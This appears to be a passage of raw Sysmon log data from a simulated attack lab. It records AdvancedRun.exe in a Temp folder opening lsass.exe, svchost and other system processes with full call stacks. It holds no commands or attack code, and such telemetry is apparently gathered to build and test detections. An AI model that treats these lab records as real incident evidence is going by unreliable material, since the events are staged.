20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004080455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.459{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004080454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.458{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.457{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004080447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.456{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.455{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004080439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.447{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.833{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Te